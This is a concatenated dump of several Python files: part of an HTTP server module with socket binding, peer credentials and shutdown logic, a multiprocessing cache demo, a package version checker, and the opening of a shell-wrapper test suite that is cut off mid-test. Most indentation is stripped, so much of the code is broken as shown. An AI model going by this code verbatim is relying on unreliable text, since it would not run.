"""Return the user id of the connected peer process."""
_, uid, _ = self.get_peer_creds()
return uid
@property
def peer_gid(self):
"""Return the group id of the connected peer process."""
_, _, gid = self.get_peer_creds()
return gid
def resolve_peer_creds(self): # LRU cached on per-instance basis
"""Look up the username and group tuple of the ``PEERCREDS``.
:returns: the username and group tuple of the ``PEERCREDS``
:raises NotImplementedError: if the OS is unsupported
:raises RuntimeError: if UID/GID lookup is unsupported or disabled
"""
if not IS_UID_GID_RESOLVABLE:
raise NotImplementedError(
'UID/GID lookup is unavailable under current platform. '
'It can only be done under UNIX-like OS '
'but not under the Google App Engine',
)
elif not self.peercreds_resolve_enabled:
raise RuntimeError(
'UID/GID lookup is disabled within this server',
)
user = pwd.getpwuid(self.peer_uid).pw_name # [0]
group = grp.getgrgid(self.peer_gid).gr_name # [0]
return user, group
@property
def peer_user(self):
"""Return the username of the connected peer process."""
user, _ = self.resolve_peer_creds()
return user
@property
def peer_group(self):
"""Return the group of the connected peer process."""
_, group = self.resolve_peer_creds()
return group
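    # Illustrative note (not from the original source): peer credential lookup
    # only applies to AF_UNIX listeners and must be enabled explicitly, e.g.
    # (hypothetical gateway class and socket path):
    #     server = HTTPServer(
    #         bind_addr='/run/app.sock', gateway=SomeGateway,
    #         peercreds_enabled=True, peercreds_resolve_enabled=True,
    #     )
    # after which a connection's peer_uid / peer_user properties resolve the
    # client's UID and username via SO_PEERCRED.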
def _close_kernel_socket(self):
"""Close kernel socket in outdated Python versions.
On old Python versions,
Python's socket module does NOT call close on the kernel
socket when you call socket.close(). We do so manually here
because we want this server to send a FIN TCP segment
immediately. Note this must be called *before* calling
socket.close(), because the latter drops its reference to
the kernel socket.
"""
if six.PY2 and hasattr(self.socket, '_sock'):
self.socket._sock.close()
class HTTPServer:
"""An HTTP server."""
_bind_addr = '127.0.0.1'
_interrupt = None
gateway = None
"""A Gateway instance."""
minthreads = None
"""The minimum number of worker threads to create (default 10)."""
maxthreads = None
"""The maximum number of worker threads to create.
(default -1 = no limit)"""
server_name = None
"""The name of the server; defaults to ``self.version``."""
protocol = 'HTTP/1.1'
"""The version string to write in the Status-Line of all HTTP responses.
For example, "HTTP/1.1" is the default. This also limits the supported
features used in the response."""
request_queue_size = 5
"""The 'backlog' arg to socket.listen(); max queued connections.
(default 5)."""
shutdown_timeout = 5
"""The total time to wait for worker threads to cleanly exit.
Specified in seconds."""
timeout = 10
"""The timeout in seconds for accepted connections (default 10)."""
version = 'Cheroot/{version!s}'.format(version=__version__)
"""A version string for the HTTPServer."""
software = None
"""The value to set for the SERVER_SOFTWARE entry in the WSGI environ.
If None, this defaults to ``'%s Server' % self.version``.
"""
ready = False
"""Internal flag which indicating the socket is accepting connections."""
max_request_header_size = 0
"""The maximum size, in bytes, for request headers, or 0 for no limit."""
max_request_body_size = 0
"""The maximum size, in bytes, for request bodies, or 0 for no limit."""
nodelay = True
"""If True (the default since 3.1), sets the TCP_NODELAY socket option."""
ConnectionClass = HTTPConnection
"""The class to use for handling HTTP connections."""
ssl_adapter = None
"""An instance of ``ssl.Adapter`` (or a subclass).
Ref: :py:class:`ssl.Adapter <cheroot.ssl.Adapter>`.
You must have the corresponding TLS driver library installed.
"""
peercreds_enabled = False
"""
If :py:data:`True`, peer creds will be looked up via UNIX domain socket.
"""
peercreds_resolve_enabled = False
"""
If :py:data:`True`, username/group will be looked up in the OS from
``PEERCREDS``-provided IDs.
"""
keep_alive_conn_limit = 10
"""The maximum number of waiting keep-alive connections that will be kept open.
Default is 10. Set to None to have unlimited connections."""
def __init__(
self, bind_addr, gateway,
minthreads=10, maxthreads=-1, server_name=None,
peercreds_enabled=False, peercreds_resolve_enabled=False,
):
"""Initialize HTTPServer instance.
Args:
bind_addr (tuple): network interface to listen to
gateway (Gateway): gateway for processing HTTP requests
minthreads (int): minimum number of threads for HTTP thread pool
maxthreads (int): maximum number of threads for HTTP thread pool
server_name (str): web server name to be advertised via Server
HTTP header
"""
self.bind_addr = bind_addr
self.gateway = gateway
self.requests = threadpool.ThreadPool(
self, min=minthreads or 1, max=maxthreads,
)
self.connections = connections.ConnectionManager(self)
if not server_name:
server_name = self.version
self.server_name = server_name
self.peercreds_enabled = peercreds_enabled
self.peercreds_resolve_enabled = (
peercreds_resolve_enabled and peercreds_enabled
)
self.clear_stats()
def clear_stats(self):
"""Reset server stat counters.."""
self._start_time = None
self._run_time = 0
self.stats = {
'Enabled': False,
'Bind Address': lambda s: repr(self.bind_addr),
'Run time': lambda s: (not s['Enabled']) and -1 or self.runtime(),
'Accepts': 0,
'Accepts/sec': lambda s: s['Accepts'] / self.runtime(),
'Queue': lambda s: getattr(self.requests, 'qsize', None),
'Threads': lambda s: len(getattr(self.requests, '_threads', [])),
'Threads Idle': lambda s: getattr(self.requests, 'idle', None),
'Socket Errors': 0,
'Requests': lambda s: (not s['Enabled']) and -1 or sum(
[w['Requests'](w) for w in s['Worker Threads'].values()], 0,
),
'Bytes Read': lambda s: (not s['Enabled']) and -1 or sum(
[w['Bytes Read'](w) for w in s['Worker Threads'].values()], 0,
),
'Bytes Written': lambda s: (not s['Enabled']) and -1 or sum(
[w['Bytes Written'](w) for w in s['Worker Threads'].values()],
0,
),
'Work Time': lambda s: (not s['Enabled']) and -1 or sum(
[w['Work Time'](w) for w in s['Worker Threads'].values()], 0,
),
'Read Throughput': lambda s: (not s['Enabled']) and -1 or sum(
[w['Bytes Read'](w) / (w['Work Time'](w) or 1e-6)
for w in s['Worker Threads'].values()], 0,
),
'Write Throughput': lambda s: (not s['Enabled']) and -1 or sum(
[w['Bytes Written'](w) / (w['Work Time'](w) or 1e-6)
for w in s['Worker Threads'].values()], 0,
),
'Worker Threads': {},
}
logging.statistics['Cheroot HTTPServer %d' % id(self)] = self.stats
def runtime(self):
"""Return server uptime."""
if self._start_time is None:
return self._run_time
else:
return self._run_time + (time.time() - self._start_time)
def __str__(self):
"""Render Server instance representing bind address."""
return '%s.%s(%r)' % (
self.__module__, self.__class__.__name__,
self.bind_addr,
)
@property
def bind_addr(self):
"""Return the interface on which to listen for connections.
For TCP sockets, a (host, port) tuple. Host values may be any
:term:`IPv4` or :term:`IPv6` address, or any valid hostname.
The string 'localhost' is a synonym for '127.0.0.1' (or '::1',
if your hosts file prefers :term:`IPv6`).
The string '0.0.0.0' is a special :term:`IPv4` entry meaning
"any active interface" (INADDR_ANY), and '::' is the similar
IN6ADDR_ANY for :term:`IPv6`.
The empty string or :py:data:`None` are not allowed.
For UNIX sockets, supply the file name as a string.
        Systemd socket activation is automatic and doesn't require tampering
with this variable.
.. glossary::
:abbr:`IPv4 (Internet Protocol version 4)`
Internet Protocol version 4
:abbr:`IPv6 (Internet Protocol version 6)`
Internet Protocol version 6
"""
return self._bind_addr
@bind_addr.setter
def bind_addr(self, value):
"""Set the interface on which to listen for connections."""
if isinstance(value, tuple) and value[0] in ('', None):
# Despite the socket module docs, using '' does not
# allow AI_PASSIVE to work. Passing None instead
# returns '0.0.0.0' like we want. In other words:
            #     host    AI_PASSIVE    result
            #      ''         Y         192.168.x.y
            #      ''         N         192.168.x.y
            #     None        Y         0.0.0.0
            #     None        N         127.0.0.1
# But since you can get the same effect with an explicit
# '0.0.0.0', we deny both the empty string and None as values.
raise ValueError(
"Host values of '' or None are not allowed. "
"Use '0.0.0.0' (IPv4) or '::' (IPv6) instead "
'to listen on all active interfaces.',
)
self._bind_addr = value
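        # Illustrative note (not from the original source): accepted values
        # include a TCP pair such as ('0.0.0.0', 8080) or ('::', 8080) and a
        # UNIX socket path such as '/run/app.sock'; '' and None are rejected
        # by the check above.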
def safe_start(self):
"""Run the server forever, and stop it cleanly on exit."""
try:
self.start()
except (KeyboardInterrupt, IOError):
# The time.sleep call might raise
# "IOError: [Errno 4] Interrupted function call" on KBInt.
self.error_log('Keyboard Interrupt: shutting down')
self.stop()
raise
except SystemExit:
self.error_log('SystemExit raised: shutting down')
self.stop()
raise
def prepare(self):
"""Prepare server to serving requests.
It binds a socket's port, setups the socket to ``listen()`` and does
other preparing things.
"""
self._interrupt = None
if self.software is None:
self.software = '%s Server' % self.version
# Select the appropriate socket
self.socket = None
msg = 'No socket could be created'
if os.getenv('LISTEN_PID', None):
# systemd socket activation
self.socket = socket.fromfd(3, socket.AF_INET, socket.SOCK_STREAM)
elif isinstance(self.bind_addr, (six.text_type, six.binary_type)):
# AF_UNIX socket
try:
self.bind_unix_socket(self.bind_addr)
except socket.error as serr:
msg = '%s -- (%s: %s)' % (msg, self.bind_addr, serr)
six.raise_from(socket.error(msg), serr)
else:
# AF_INET or AF_INET6 socket
# Get the correct address family for our host (allows IPv6
# addresses)
host, port = self.bind_addr
try:
info = socket.getaddrinfo(
host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM, 0, socket.AI_PASSIVE,
)
except socket.gaierror:
sock_type = socket.AF_INET
bind_addr = self.bind_addr
if ':' in host:
sock_type = socket.AF_INET6
bind_addr = bind_addr + (0, 0)
info = [(sock_type, socket.SOCK_STREAM, 0, '', bind_addr)]
for res in info:
af, socktype, proto, canonname, sa = res
try:
self.bind(af, socktype, proto)
break
except socket.error as serr:
msg = '%s -- (%s: %s)' % (msg, sa, serr)
if self.socket:
self.socket.close()
self.socket = None
if not self.socket:
raise socket.error(msg)
# Timeout so KeyboardInterrupt can be caught on Win32
self.socket.settimeout(1)
self.socket.listen(self.request_queue_size)
# Create worker threads
self.requests.start()
self.ready = True
self._start_time = time.time()
def serve(self):
"""Serve requests, after invoking :func:`prepare()`."""
while self.ready:
try:
self.tick()
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
self.error_log(
'Error in HTTPServer.tick', level=logging.ERROR,
traceback=True,
)
if self.interrupt:
while self.interrupt is True:
# Wait for self.stop() to complete. See _set_interrupt.
time.sleep(0.1)
if self.interrupt:
raise self.interrupt
def start(self):
"""Run the server forever.
It is shortcut for invoking :func:`prepare()` then :func:`serve()`.
"""
# We don't have to trap KeyboardInterrupt or SystemExit here,
# because cherrypy.server already does so, calling self.stop() for us.
# If you're using this server with another framework, you should
# trap those exceptions in whatever code block calls start().
self.prepare()
self.serve()
@contextlib.contextmanager
def _run_in_thread(self):
"""Context manager for running this server in a thread."""
self.prepare()
thread = threading.Thread(target=self.serve)
thread.setDaemon(True)
thread.start()
try:
yield thread
finally:
self.stop()
def error_log(self, msg='', level=20, traceback=False):
"""Write error message to log.
Args:
msg (str): error message
level (int): logging level
traceback (bool): add traceback to output or not
"""
# Override this in subclasses as desired
sys.stderr.write('{msg!s}\n'.format(msg=msg))
sys.stderr.flush()
if traceback:
tblines = traceback_.format_exc()
sys.stderr.write(tblines)
sys.stderr.flush()
def bind(self, family, type, proto=0):
"""Create (or recreate) the actual socket object."""
sock = self.prepare_socket(
self.bind_addr,
family, type, proto,
self.nodelay, self.ssl_adapter,
)
sock = self.socket = self.bind_socket(sock, self.bind_addr)
self.bind_addr = self.resolve_real_bind_addr(sock)
return sock
def bind_unix_socket(self, bind_addr):
"""Create (or recreate) a UNIX socket object."""
if IS_WINDOWS:
"""
Trying to access socket.AF_UNIX under Windows
causes an AttributeError.
"""
raise ValueError( # or RuntimeError?
'AF_UNIX sockets are not supported under Windows.',
)
fs_permissions = 0o777 # TODO: allow changing mode
try:
# Make possible reusing the socket...
os.unlink(self.bind_addr)
except OSError:
"""
File does not exist, which is the primary goal anyway.
"""
except TypeError as typ_err:
err_msg = str(typ_err)
if (
'remove() argument 1 must be encoded '
'string without null bytes, not unicode'
not in err_msg
and 'embedded NUL character' not in err_msg # py34
and 'argument must be a '
'string without NUL characters' not in err_msg # pypy2
):
raise
except ValueError as val_err:
err_msg = str(val_err)
if (
'unlink: embedded null '
'character in path' not in err_msg
and 'embedded null byte' not in err_msg
and 'argument must be a '
'string without NUL characters' not in err_msg # pypy3
):
raise
sock = self.prepare_socket(
bind_addr=bind_addr,
family=socket.AF_UNIX, type=socket.SOCK_STREAM, proto=0,
nodelay=self.nodelay, ssl_adapter=self.ssl_adapter,
)
try:
"""Linux way of pre-populating fs mode permissions."""
            # Allow everyone to access the socket...
os.fchmod(sock.fileno(), fs_permissions)
FS_PERMS_SET = True
except OSError:
FS_PERMS_SET = False
try:
sock = self.bind_socket(sock, bind_addr)
except socket.error:
sock.close()
raise
bind_addr = self.resolve_real_bind_addr(sock)
try:
"""FreeBSD/macOS pre-populating fs mode permissions."""
if not FS_PERMS_SET:
try:
os.lchmod(bind_addr, fs_permissions)
except AttributeError:
os.chmod(bind_addr, fs_permissions, follow_symlinks=False)
FS_PERMS_SET = True
except OSError:
pass
if not FS_PERMS_SET:
self.error_log(
'Failed to set socket fs mode permissions',
level=logging.WARNING,
)
self.bind_addr = bind_addr
self.socket = sock
return sock
@staticmethod
def prepare_socket(bind_addr, family, type, proto, nodelay, ssl_adapter):
"""Create and prepare the socket object."""
sock = socket.socket(family, type, proto)
connections.prevent_socket_inheritance(sock)
host, port = bind_addr[:2]
IS_EPHEMERAL_PORT = port == 0
if not (IS_WINDOWS or IS_EPHEMERAL_PORT):
"""Enable SO_REUSEADDR for the current socket.
Skip for Windows (has different semantics)
or ephemeral ports (can steal ports from others).
Refs:
* https://msdn.microsoft.com/en-us/library/ms740621(v=vs.85).aspx
* https://github.com/cherrypy/cheroot/issues/114
* https://gavv.github.io/blog/ephemeral-port-reuse/
"""
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if nodelay and not isinstance(
bind_addr,
(six.text_type, six.binary_type),
):
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if ssl_adapter is not None:
sock = ssl_adapter.bind(sock)
# If listening on the IPV6 any address ('::' = IN6ADDR_ANY),
# activate dual-stack. See
# https://github.com/cherrypy/cherrypy/issues/871.
listening_ipv6 = (
hasattr(socket, 'AF_INET6')
and family == socket.AF_INET6
and host in ('::', '::0', '::0.0.0.0')
)
if listening_ipv6:
try:
sock.setsockopt(
socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0,
)
except (AttributeError, socket.error):
# Apparently, the socket option is not available in
# this machine's TCP stack
pass
return sock
@staticmethod
def bind_socket(socket_, bind_addr):
"""Bind the socket to given interface."""
socket_.bind(bind_addr)
return socket_
@staticmethod
def resolve_real_bind_addr(socket_):
"""Retrieve actual bind address from bound socket."""
        # FIXME: keep the requested bind_addr separate from the real bound
        # addr (the port differs when an ephemeral port 0 was requested)
bind_addr = socket_.getsockname()
if socket_.family in (
# Windows doesn't have socket.AF_UNIX, so not using it in check
socket.AF_INET,
socket.AF_INET6,
):
"""UNIX domain sockets are strings or bytes.
In case of bytes with a leading null-byte it's an abstract socket.
"""
return bind_addr[:2]
if isinstance(bind_addr, six.binary_type):
bind_addr = bton(bind_addr)
return bind_addr
def tick(self):
"""Accept a new connection and put it on the Queue."""
if not self.ready:
return
conn = self.connections.get_conn(self.socket)
if conn:
try:
self.requests.put(conn)
except queue.Full:
# Just drop the conn. TODO: write 503 back?
conn.close()
self.connections.expire()
@property
def interrupt(self):
"""Flag interrupt of the server."""
return self._interrupt
@interrupt.setter
def interrupt(self, interrupt):
"""Perform the shutdown of this server and save the exception."""
self._interrupt = True
self.stop()
self._interrupt = interrupt
def stop(self):
"""Gracefully shutdown a server that is serving forever."""
self.ready = False
if self._start_time is not None:
self._run_time += (time.time() - self._start_time)
self._start_time = None
sock = getattr(self, 'socket', None)
if sock:
if not isinstance(
self.bind_addr,
(six.text_type, six.binary_type),
):
# Touch our own socket to make accept() return immediately.
try:
host, port = sock.getsockname()[:2]
except socket.error as ex:
if ex.args[0] not in errors.socket_errors_to_ignore:
# Changed to use error code and not message
# See
# https://github.com/cherrypy/cherrypy/issues/860.
raise
else:
# Note that we're explicitly NOT using AI_PASSIVE,
# here, because we want an actual IP to touch.
# localhost won't work if we've bound to a public IP,
# but it will if we bound to '0.0.0.0' (INADDR_ANY).
for res in socket.getaddrinfo(
host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM,
):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See
# https://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
except socket.error:
if s:
s.close()
if hasattr(sock, 'close'):
sock.close()
self.socket = None
self.connections.close()
self.requests.stop(self.shutdown_timeout)
class Gateway:
"""Base class to interface HTTPServer with other systems, such as WSGI."""
def __init__(self, req):
"""Initialize Gateway instance with request.
Args:
req (HTTPRequest): current HTTP request
"""
self.req = req
def respond(self):
"""Process the current request. Must be overridden in a subclass."""
raise NotImplementedError # pragma: no cover
# These may either be ssl.Adapter subclasses or the string names
# of such classes (in which case they will be lazily loaded).
ssl_adapters = {
'builtin': 'cheroot.ssl.builtin.BuiltinSSLAdapter',
'pyopenssl': 'cheroot.ssl.pyopenssl.pyOpenSSLAdapter',
}
def get_ssl_adapter_class(name='builtin'):
"""Return an SSL adapter class for the given name."""
adapter = ssl_adapters[name.lower()]
if isinstance(adapter, six.string_types):
last_dot = adapter.rfind('.')
attr_name = adapter[last_dot + 1:]
mod_path = adapter[:last_dot]
try:
mod = sys.modules[mod_path]
if mod is None:
raise KeyError()
except KeyError:
# The last [''] is important.
mod = __import__(mod_path, globals(), locals(), [''])
# Let an AttributeError propagate outward.
try:
adapter = getattr(mod, attr_name)
except AttributeError:
raise AttributeError("'%s' object has no attribute '%s'"
% (mod_path, attr_name))
return adapter
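# --- Illustrative example (not part of cheroot itself) ----------------------
# A minimal sketch of how the pieces above fit together: subclass ``Gateway``,
# hand the subclass to ``HTTPServer`` and start serving.  ``_HelloGateway``
# and the host/port below are invented for this sketch; WSGI plumbing and
# error handling are deliberately omitted.
class _HelloGateway(Gateway):
    """Illustrative gateway that answers every request with a fixed body."""
    def respond(self):
        req = self.req
        body = b'Hello, world!\r\n'
        req.status = b'200 OK'
        req.outheaders.extend([
            (b'Content-Type', b'text/plain'),
            (b'Content-Length', str(len(body)).encode('ascii')),
        ])
        req.ensure_headers_sent()
        req.write(body)
if __name__ == '__main__':  # run the sketch only when executed directly
    _demo = HTTPServer(bind_addr=('127.0.0.1', 8080), gateway=_HelloGateway)
    _demo.safe_start()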
|
process.py
|
from jitcache import Cache
import time
import multiprocessing as mp
cache = Cache()
@cache.memoize
def slow_fn(input_1, input_2):
print("Slow Function Called")
time.sleep(1)
return input_1 * input_2
n_processes = 10
process_list = []
# Create a set of processes who will request the same value
for i in range(n_processes):
p = mp.Process(target=slow_fn, args=(10, 4))
process_list.append(p)
# Start each process
for p in process_list:
p.start()
# Wait for completion
for p in process_list:
p.join()
# Print the value that they tried to compute
print(slow_fn(10, 4))
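# --- Illustrative sketch (not jitcache's actual implementation) -------------
# One way a cross-process memoizer *could* be built with the standard library
# alone: a Manager-backed dict shares results between processes while a lock
# keeps the slow function from running more than once per key.  The name
# ``simple_memoize`` is invented here purely for illustration.
import functools
def simple_memoize(fn):
    """Cache ``fn`` results in a dict shared across processes."""
    manager = mp.Manager()     # proxy objects usable from child processes
    results = manager.dict()   # shared (args -> result) cache
    guard = manager.Lock()     # serialise the first computation per key
    @functools.wraps(fn)
    def wrapper(*args):
        with guard:
            if args not in results:
                results[args] = fn(*args)
        return results[args]
    return wrapper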
|
version.py
|
# Adapted from https://github.com/snap-stanford/ogb/blob/master/ogb/version.py
import os
import logging
from threading import Thread
__version__ = '1.1.0'
try:
os.environ['OUTDATED_IGNORE'] = '1'
from outdated import check_outdated # noqa
except ImportError:
check_outdated = None
def check():
try:
is_outdated, latest = check_outdated('wilds', __version__)
if is_outdated:
logging.warning(
f'The WILDS package is out of date. Your version is '
f'{__version__}, while the latest version is {latest}.')
except Exception:
pass
if check_outdated is not None:
thread = Thread(target=check)
thread.start()
|
test.py
|
# -*- coding: utf8 -*-
from contextlib import contextmanager
from functools import wraps
from os.path import exists, join, realpath, dirname, split
import errno
import fcntl
import inspect
import logging
import os
import platform
import pty
import resource
import sh
import signal
import stat
import sys
import tempfile
import time
import unittest
import warnings
IS_PY3 = sys.version_info[0] == 3
IS_PY2 = not IS_PY3
MINOR_VER = sys.version_info[1]
# coverage doesn't work in python 3.1, 3.2 due to it just being a shit
# python
HAS_UNICODE_LITERAL = not (IS_PY3 and MINOR_VER in (1, 2))
cov = None
if HAS_UNICODE_LITERAL:
run_idx = int(os.environ.pop("SH_TEST_RUN_IDX", "0"))
first_run = run_idx == 0
try:
import coverage
except ImportError:
pass
else:
# for some reason, we can't run auto_data on the first run, or the coverage
# numbers get really screwed up
auto_data = True
if first_run:
auto_data = False
cov = coverage.Coverage(auto_data=auto_data)
if first_run:
cov.erase()
cov.start()
try:
import unittest.mock
except ImportError:
HAS_MOCK = False
else:
HAS_MOCK = True
# we have to use the real path because on osx, /tmp is a symlink to
# /private/tmp, and so assertions that gettempdir() == sh.pwd() will fail
tempdir = realpath(tempfile.gettempdir())
IS_MACOS = platform.system() in ("AIX", "Darwin")
# these 3 functions are helpers for modifying PYTHONPATH with a module's main
# directory
def append_pythonpath(env, path):
key = "PYTHONPATH"
pypath = [p for p in env.get(key, "").split(":") if p]
pypath.insert(0, path)
pypath = ":".join(pypath)
env[key] = pypath
def get_module_import_dir(m):
mod_file = inspect.getsourcefile(m)
is_package = mod_file.endswith("__init__.py")
mod_dir = dirname(mod_file)
if is_package:
mod_dir, _ = split(mod_dir)
return mod_dir
def append_module_path(env, m):
append_pythonpath(env, get_module_import_dir(m))
if IS_PY3:
xrange = range
unicode = str
long = int
from io import StringIO
ioStringIO = StringIO
from io import BytesIO as cStringIO
iocStringIO = cStringIO
else:
from StringIO import StringIO
from cStringIO import StringIO as cStringIO
from io import StringIO as ioStringIO
from io import BytesIO as iocStringIO
THIS_DIR = dirname(os.path.abspath(__file__))
system_python = sh.Command(sys.executable)
# this is to ensure that our `python` helper here is able to import our local sh
# module, and not the system one
baked_env = os.environ.copy()
append_module_path(baked_env, sh)
python = system_python.bake(_env=baked_env)
if hasattr(logging, 'NullHandler'):
NullHandler = logging.NullHandler
else:
class NullHandler(logging.Handler):
def handle(self, record):
pass
def emit(self, record):
pass
def createLock(self):
self.lock = None
skipUnless = getattr(unittest, "skipUnless", None)
if not skipUnless:
# our stupid skipUnless wrapper for python2.6
def skipUnless(condition, reason):
def wrapper(test):
if condition:
return test
else:
@wraps(test)
def skip(*args, **kwargs):
return
return skip
return wrapper
skip_unless = skipUnless
def requires_progs(*progs):
missing = []
for prog in progs:
try:
sh.Command(prog)
except sh.CommandNotFound:
missing.append(prog)
friendly_missing = ", ".join(missing)
return skipUnless(len(missing) == 0, "Missing required system programs: %s"
% friendly_missing)
requires_posix = skipUnless(os.name == "posix", "Requires POSIX")
requires_utf8 = skipUnless(sh.DEFAULT_ENCODING == "UTF-8", "System encoding must be UTF-8")
not_macos = skipUnless(not IS_MACOS, "Doesn't work on MacOS")
requires_py3 = skipUnless(IS_PY3, "Test only works on Python 3")
requires_py35 = skipUnless(IS_PY3 and MINOR_VER >= 5, "Test only works on Python 3.5 or higher")
def requires_poller(poller):
use_select = bool(int(os.environ.get("SH_TESTS_USE_SELECT", "0")))
cur_poller = "select" if use_select else "poll"
return skipUnless(cur_poller == poller, "Only enabled for select.%s" % cur_poller)
@contextmanager
def ulimit(key, new_soft):
soft, hard = resource.getrlimit(key)
resource.setrlimit(key, (new_soft, hard))
try:
yield
finally:
resource.setrlimit(key, (soft, hard))
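# Example (illustrative) use of the ulimit() helper above: temporarily lower
# the soft limit on open file descriptors for the duration of a block, e.g.
#     with ulimit(resource.RLIMIT_NOFILE, 128):
#         ...  # code under test sees the reduced soft limit
# the original soft limit is restored when the block exits.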
def create_tmp_test(code, prefix="tmp", delete=True, **kwargs):
""" creates a temporary test file that lives on disk, on which we can run
python with sh """
py = tempfile.NamedTemporaryFile(prefix=prefix, delete=delete)
code = code.format(**kwargs)
if IS_PY3:
code = code.encode("UTF-8")
py.write(code)
py.flush()
# make the file executable
st = os.stat(py.name)
os.chmod(py.name, st.st_mode | stat.S_IEXEC)
# we don't explicitly close, because close will remove the file, and we
# don't want that until the test case is done. so we let the gc close it
# when it goes out of scope
return py
class BaseTests(unittest.TestCase):
def assert_oserror(self, num, fn, *args, **kwargs):
try:
fn(*args, **kwargs)
except OSError as e:
self.assertEqual(e.errno, num)
def assert_deprecated(self, fn, *args, **kwargs):
with warnings.catch_warnings(record=True) as w:
fn(*args, **kwargs)
self.assertEqual(len(w), 1)
self.assertTrue(issubclass(w[-1].category, DeprecationWarning))
# python2.6 lacks this
def assertIn(self, needle, haystack):
s = super(BaseTests, self)
if hasattr(s, "assertIn"):
s.assertIn(needle, haystack)
else:
self.assertTrue(needle in haystack)
# python2.6 lacks this
def assertNotIn(self, needle, haystack):
s = super(BaseTests, self)
if hasattr(s, "assertNotIn"):
s.assertNotIn(needle, haystack)
else:
self.assertTrue(needle not in haystack)
# python2.6 lacks this
def assertLess(self, a, b):
s = super(BaseTests, self)
if hasattr(s, "assertLess"):
s.assertLess(a, b)
else:
self.assertTrue(a < b)
# python2.6 lacks this
def assertGreater(self, a, b):
s = super(BaseTests, self)
if hasattr(s, "assertGreater"):
s.assertGreater(a, b)
else:
self.assertTrue(a > b)
# python2.6 lacks this
def skipTest(self, msg):
s = super(BaseTests, self)
if hasattr(s, "skipTest"):
s.skipTest(msg)
else:
return
@requires_posix
class FunctionalTests(BaseTests):
def setUp(self):
self._environ = os.environ.copy()
def tearDown(self):
os.environ = self._environ
def test_print_command(self):
from sh import ls, which
actual_location = which("ls")
out = str(ls)
self.assertEqual(out, actual_location)
def test_unicode_arg(self):
from sh import echo
test = "漢字"
if not IS_PY3:
test = test.decode("utf8")
p = echo(test, _encoding="utf8")
output = p.strip()
self.assertEqual(test, output)
def test_unicode_exception(self):
from sh import ErrorReturnCode
py = create_tmp_test("exit(1)")
arg = "漢字"
native_arg = arg
if not IS_PY3:
arg = arg.decode("utf8")
try:
python(py.name, arg, _encoding="utf8")
except ErrorReturnCode as e:
self.assertIn(native_arg, str(e))
else:
self.fail("exception wasn't raised")
def test_pipe_fd(self):
py = create_tmp_test("""print("hi world")""")
read_fd, write_fd = os.pipe()
python(py.name, _out=write_fd)
out = os.read(read_fd, 10)
self.assertEqual(out, b"hi world\n")
def test_trunc_exc(self):
py = create_tmp_test("""
import sys
sys.stdout.write("a" * 1000)
sys.stderr.write("b" * 1000)
exit(1)
""")
self.assertRaises(sh.ErrorReturnCode, python, py.name)
def test_number_arg(self):
py = create_tmp_test("""
from optparse import OptionParser
parser = OptionParser()
options, args = parser.parse_args()
print(args[0])
""")
out = python(py.name, 3).strip()
self.assertEqual(out, "3")
def test_empty_stdin_no_hang(self):
py = create_tmp_test("""
import sys
data = sys.stdin.read()
sys.stdout.write("no hang")
""")
out = python(py.name, _in="", _timeout=2)
self.assertEqual(out, "no hang")
out = python(py.name, _in=None, _timeout=2)
self.assertEqual(out, "no hang")
def test_exit_code(self):
from sh import ErrorReturnCode
py = create_tmp_test("""
exit(3)
""")
self.assertRaises(ErrorReturnCode, python, py.name)
def test_patched_glob(self):
from glob import glob
py = create_tmp_test("""
import sys
print(sys.argv[1:])
""")
files = glob("*.faowjefoajweofj")
out = python(py.name, files).strip()
self.assertEqual(out, "['*.faowjefoajweofj']")
@requires_py35
def test_patched_glob_with_recursive_argument(self):
from glob import glob
py = create_tmp_test("""
import sys
print(sys.argv[1:])
""")
files = glob("*.faowjefoajweofj", recursive=True)
out = python(py.name, files).strip()
self.assertEqual(out, "['*.faowjefoajweofj']")
def test_exit_code_with_hasattr(self):
from sh import ErrorReturnCode
py = create_tmp_test("""
exit(3)
""")
try:
out = python(py.name, _iter=True)
# hasattr can swallow exceptions
hasattr(out, 'something_not_there')
list(out)
self.assertEqual(out.exit_code, 3)
self.fail("Command exited with error, but no exception thrown")
except ErrorReturnCode:
pass
def test_exit_code_from_exception(self):
from sh import ErrorReturnCode
py = create_tmp_test("""
exit(3)
""")
self.assertRaises(ErrorReturnCode, python, py.name)
try:
python(py.name)
except Exception as e:
self.assertEqual(e.exit_code, 3)
def test_stdin_from_string(self):
from sh import sed
self.assertEqual(sed(_in="one test three", e="s/test/two/").strip(),
"one two three")
def test_ok_code(self):
from sh import ls, ErrorReturnCode_1, ErrorReturnCode_2
exc_to_test = ErrorReturnCode_2
code_to_pass = 2
if IS_MACOS:
exc_to_test = ErrorReturnCode_1
code_to_pass = 1
self.assertRaises(exc_to_test, ls, "/aofwje/garogjao4a/eoan3on")
ls("/aofwje/garogjao4a/eoan3on", _ok_code=code_to_pass)
ls("/aofwje/garogjao4a/eoan3on", _ok_code=[code_to_pass])
ls("/aofwje/garogjao4a/eoan3on", _ok_code=range(code_to_pass + 1))
def test_ok_code_none(self):
py = create_tmp_test("exit(0)")
python(py.name, _ok_code=None)
def test_none_arg(self):
py = create_tmp_test("""
import sys
print(sys.argv[1:])
""")
maybe_arg = "some"
out = python(py.name, maybe_arg).strip()
self.assertEqual(out, "['some']")
maybe_arg = None
out = python(py.name, maybe_arg).strip()
self.assertEqual(out, "[]")
def test_quote_escaping(self):
py = create_tmp_test("""
from optparse import OptionParser
parser = OptionParser()
options, args = parser.parse_args()
print(args)
""")
out = python(py.name, "one two three").strip()
self.assertEqual(out, "['one two three']")
out = python(py.name, "one \"two three").strip()
self.assertEqual(out, "['one \"two three']")
out = python(py.name, "one", "two three").strip()
self.assertEqual(out, "['one', 'two three']")
out = python(py.name, "one", "two \"haha\" three").strip()
self.assertEqual(out, "['one', 'two \"haha\" three']")
out = python(py.name, "one two's three").strip()
self.assertEqual(out, "[\"one two's three\"]")
out = python(py.name, 'one two\'s three').strip()
self.assertEqual(out, "[\"one two's three\"]")
def test_multiple_pipes(self):
import time
py = create_tmp_test("""
import sys
import os
import time
for l in "andrew":
sys.stdout.write(l)
